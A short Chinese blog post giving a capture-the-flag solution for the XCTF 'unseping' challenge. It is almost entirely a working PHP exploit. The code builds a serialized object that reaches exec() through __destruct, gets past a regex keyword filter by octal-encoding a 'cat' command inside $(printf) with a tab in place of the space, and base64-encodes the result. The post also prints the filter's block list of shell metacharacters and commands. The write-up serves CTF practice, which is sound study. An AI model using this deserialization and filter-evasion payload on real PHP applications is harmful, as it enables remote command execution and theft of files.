xctf unseping

 php的payload如下:注意$printf后面接Tab,空格要被waf禁掉

 <?php
highlight_file(__FILE__);

class ease{
    
    private $method;
    private $args;
    function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }
 
    function __destruct(){
        if (in_array($this->method, array("ping"))) {
            call_user_func_array(array($this, $this->method), $this->args);
        }
    } 
 
    function ping($ip){
        exec($ip, $result);
        var_dump($result);
    }
 
    function waf($str){
        if (!preg_match_all("/(\||&|;| |\/|cat|flag|tac|php|ls)/", $str, $pat_array)) {
            return $str;
        } else {
            echo "don't hack";
        }
    }
 
    function __wakeup(){
        foreach($this->args as $k => $v) {
            $this->args[$k] = $this->waf($v);
        }
    }   
}
$b = "cat flag_1s_here/flag_831b69012c67b35f.php";
$c = "";
for($i=0;$i<strlen($b);$i++){
	$temp_str = decoct(ord(substr($b,$i,1)));
	$c = $c."\\".$temp_str;
}
echo $c;
$c = '$(printf	"'.$c.'")';
$a = array($c);
$ctf = new ease("ping",$a);
echo base64_encode(serialize($ctf));
?>

posted on   小丑首长  阅读(31)  评论(0编辑  收藏  举报

相关博文:
· 成理信安大挑战ctf 部分wp
· xctf very_easy_sql
· 江苏工匠杯unseping(反序列化+Linux命令执行{$(printf '\154\163')})
· [攻防世界][江苏工匠杯]unseping
· 江苏工匠杯_unseping_wp
阅读排行:
· Manus爆火,是硬核还是营销?
· 终于写完轮子一部分:tcp代理 了,记录一下
· 震惊!C++程序真的从main开始吗?99%的程序员都答错了
· 别再用vector<bool>了!Google高级工程师:这可能是STL最大的设计失误
· 单元测试从入门到精通
点击右上角即可分享
微信分享提示